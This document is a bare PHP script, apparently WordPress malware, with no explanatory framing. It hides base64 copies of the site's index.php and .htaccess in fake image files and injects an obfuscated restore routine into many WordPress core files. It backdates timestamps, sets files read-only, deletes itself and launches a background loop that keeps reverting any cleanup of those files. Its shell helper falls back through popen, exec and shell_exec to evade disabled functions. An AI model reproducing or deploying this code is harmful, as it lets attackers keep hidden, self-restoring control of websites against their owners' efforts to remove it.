error_reporting(0);
function getPhpPath()
{
    ob_start();
    phpinfo(1);
    $info = ob_get_contents();
    ob_end_clean();
    preg_match("/--bindir=([^&]+)/si", $info, $matches);
    if (isset($matches[1]) && $matches[1] != '') {
        return $matches[1] . '/php';
    }
    preg_match("/--prefix=([^&]+)/si", $info, $matches);
    if (!isset($matches[1])) {
        return 'php';
    }
    return $matches[1] . '/bin/php';
}

$php_path = getPhpPath();
function is_cli()
{
    $is_cli = preg_match("/cli/i", php_sapi_name()) ? true : false;
    if ($is_cli === false) {
        if (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) {
            $is_cli = true;
        }
    }
    if ($is_cli === false) {
        if (!isset($_SERVER['SCRIPT_NAME'])) {
            $is_cli = true;
        }
    }
    return $is_cli;
}

$fosin = '/wp-includes/images/media/images.png';
$foshv = '/wp-includes/images/media/images.svg';
$dsdfin = $_SERVER['DOCUMENT_ROOT'] . $fosin;
$sfhgh = $_SERVER['DOCUMENT_ROOT'] . $foshv;
$insdf = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
$hadgf = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess';
file_put_contents($dsdfin, base64_encode(file_get_contents($insdf)));
file_put_contents($sfhgh, base64_encode(file_get_contents($hadgf)));
$ctime = filemtime($_SERVER['DOCUMENT_ROOT'] . '/wp-admin/css/l10n.css');
touch($dsdfin, $ctime);
chmod($dsdfin, 0444);
touch($sfhgh, $ctime);
chmod($sfhgh, 0444);
touch($insdf, $ctime);
chmod($insdf, 0444);
touch($hadgf, $ctime);
chmod($hadgf, 0444);

$ups = '$dbghs=\'b\'.\'a\'.\'s\'.\'e\'.\'6\'.\'4\'.\'_\'.\'d\'.\'e\'.\'c\'.\'o\'.\'d\'.\'e\';$idcxs=$_SERVER[\'DOCUMENT_ROOT\'].\'/ind\'.\'ex.php\';$hdfg=$_SERVER[\'DOCUMENT_ROOT\'].\'/.htac\'.\'cess\';$bddex=$dbghs(\'' . base64_encode($dsdfin) . '\');$bksht=$dbghs(\'' . base64_encode($sfhgh) . '\');if($idcxs && file_exists($bddex)){if(!file_exists($idcxs)or(filesize($idcxs)!=filesize($bddex))){chmod($idcxs, 420);file_put_contents($idcxs, $dbghs(file_get_contents($bddex)));chmod($idcxs, 292);}}if ($hdfg && file_exists($bksht)) {if(!file_exists($hdfg) or (filesize($hdfg) != filesize($bksht))){chmod($hdfg, 420);file_put_contents($hdfg,$dbghs(file_get_contents($bksht)));chmod($hdfg, 292);}}';

$and = [0,1,2,3,4,5,6,7,8,9];
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/query.php';
    file_put_contents($crona, str_replace("function is_front_page", $ups . PHP_EOL . "function is_front_page", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/http.php';
    file_put_contents($crona, str_replace("function wp_safe_remote_post", $ups . PHP_EOL . "function wp_safe_remote_post", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/load.php';
    file_put_contents($crona, str_replace("function is_wp_error", $ups . PHP_EOL . "function is_wp_error", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/plugin.php';
    file_put_contents($crona, str_replace("function do_action_ref_array", $ups . PHP_EOL . "function do_action_ref_array", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/kses.php';
    file_put_contents($crona, str_replace("function safecss_filter_attr", $ups . PHP_EOL . "function safecss_filter_attr", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/blocks/archives.php';
    file_put_contents($crona, str_replace("function render_block_core_archives", $ups . PHP_EOL . "function render_block_core_archives", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/comment.php';
    file_put_contents($crona, str_replace("function wp_filter_comment", $ups . PHP_EOL . "function wp_filter_comment", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/theme.php';
    file_put_contents($crona, str_replace("function get_uploaded_header_images", $ups . PHP_EOL . "function get_uploaded_header_images", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/widgets.php';
    file_put_contents($crona, str_replace("function register_sidebars", $ups . PHP_EOL . "function register_sidebars", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/blocks.php';
    file_put_contents($crona, str_replace("function register_block_style_handle", $ups . PHP_EOL . "function register_block_style_handle", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/template.php';
    file_put_contents($crona, str_replace("function get_archive_template", $ups . PHP_EOL . "function get_archive_template", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/rewrite.php';
    file_put_contents($crona, str_replace("function url_to_postid", $ups . PHP_EOL . "function url_to_postid", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/admin-bar.php';
    file_put_contents($crona, str_replace("function wp_admin_bar_my_account_menu", $ups . PHP_EOL . "function wp_admin_bar_my_account_menu", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/rest-api.php';
    file_put_contents($crona, str_replace("function register_rest_field", $ups . PHP_EOL . "function register_rest_field", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/media.php';
    file_put_contents($crona, str_replace("function image_downsize", $ups . PHP_EOL . "function image_downsize", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/nav-menu.php';
    file_put_contents($crona, str_replace("function is_nav_menu_item", $ups . PHP_EOL . "function is_nav_menu_item", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/theme-templates.php';
    file_put_contents($crona, str_replace("function wp_enable_block_templates", $ups . PHP_EOL . "function wp_enable_block_templates", file_get_contents($crona)));
    touch($crona, $ctime);
}
shuffle($and);
if ($and[0] % 3 == 0) {
    $crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/block-template.php';
    file_put_contents($crona, str_replace("function _strip_template_file_suffix", $ups . PHP_EOL . "function _strip_template_file_suffix", file_get_contents($crona)));
    touch($crona, $ctime);
}
$crona = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/rest-api.php';
file_put_contents($crona, str_replace("function rest_get_combining_operation_error", $ups . PHP_EOL . "function rest_get_combining_operation_error", file_get_contents($crona)));
touch($crona, $ctime);

$current_file_path = __FILE__;
$current_dir = realpath(dirname($current_file_path));
$current_file_name = str_replace($current_dir, '', $current_file_path);
$current_file_name = str_replace("/", '', $current_file_name);
$current_file_name = str_replace("\\", '', $current_file_name);
function run($code, $method = 'popen')
{
    $disabled = explode(',', ini_get('disable_functions'));
    $new_disable = array();
    foreach ($disabled as $item) {
        $new_disable[] = trim($item);
    }
    if (in_array($method, $new_disable)) {
        $method = 'exec';
    }
    if (in_array($method, $new_disable)) {
        $method = 'shell_exec';
    }
    if (in_array($method, $new_disable)) {
        return false;
    }
    $result = '';
    switch ($method) {
        case 'exec':
            exec($code, $array);
            foreach ($array as $key => $value) {
                $result .= $key . " : " . $value . PHP_EOL;
            }
            return $result;
            break;
        case 'shell_exec':
            $output = shell_exec($code);
            foreach ($output as $key => $value) {
                $result .= $key . " : " . $value . PHP_EOL;
            }
            return $result;
            break;
        case 'popen':
            $fp = popen($code, "r");
            while (!feof($fp)) {
                $out = fgets($fp, 4096);
                $result .= $out;
            }
            pclose($fp);
            return $result;
            break;
        default:
            return false;
            break;
    }
}

function functionCheck()
{
    $disabled = explode(',', ini_get('disable_functions'));
    $new_disable = array();
    foreach ($disabled as $item) {
        $new_disable[] = trim($item);
    }
    if (in_array('exec', $new_disable) && in_array('popen', $new_disable)) {
        return false;
    }
    return true;
}

$lock_file_index = 'index.php';
$lock_file_h = '.htaccess';
if (is_cli() || @$_GET['ok'] != null) {
    @unlink($current_file_path);
    $lock_file_path = $current_dir . '/' . $lock_file_index;
    $lock_file_path_h = $current_dir . '/' . $lock_file_h;
    $content = file_get_contents($lock_file_path);
    $content_h = file_get_contents($lock_file_path_h);
    $hash_content = hash('sha1', $content);
    $hash_content_h = hash('sha1', $content_h);
    while (true) {
        if (!file_exists($lock_file_path)) {
            @file_put_contents($lock_file_path, $content);
            @touch($lock_file_path, strtotime("-400 days", time()));
            @chmod($lock_file_path, 0444);
        }
        if (!file_exists($lock_file_path_h)) {
            @file_put_contents($lock_file_path_h, $content_h);
            @touch($lock_file_path_h, strtotime("-400 days", time()));
            @chmod($lock_file_path_h, 0444);
        }
        $new_content = file_get_contents($lock_file_path);
        $new_content_h = file_get_contents($lock_file_path_h);
        if (file_exists($current_file_name)) {
            break;
        }
        $new_hash_content = hash('sha1', $new_content);
        $new_hash_content_h = hash('sha1', $new_content_h);
        if ($new_hash_content != $hash_content) {
            @unlink($lock_file_path);
            @file_put_contents($lock_file_path, $content);
            @touch($lock_file_path, strtotime("-400 days", time()));
            @chmod($lock_file_path, 0444);
        }
        if ($new_hash_content_h != $hash_content_h) {
            @unlink($lock_file_path_h);
            @file_put_contents($lock_file_path_h, $content_h);
            @touch($lock_file_path_h, strtotime("-400 days", time()));
            @chmod($lock_file_path_h, 0444);
        }
        sleep(1);
    }
}
if (functionCheck() !== false) {
    run("nohup $php_path " . $current_file_path . " >/dev/null 2>&1 &");
    if (file_exists($current_file_name)) {
        echo 'resert add success';
    } else {
        echo 'good';
    }
} else {
    echo 'File written successfully! <a href="' . $current_file_name . '?ok=1">Click Here</a>';
}
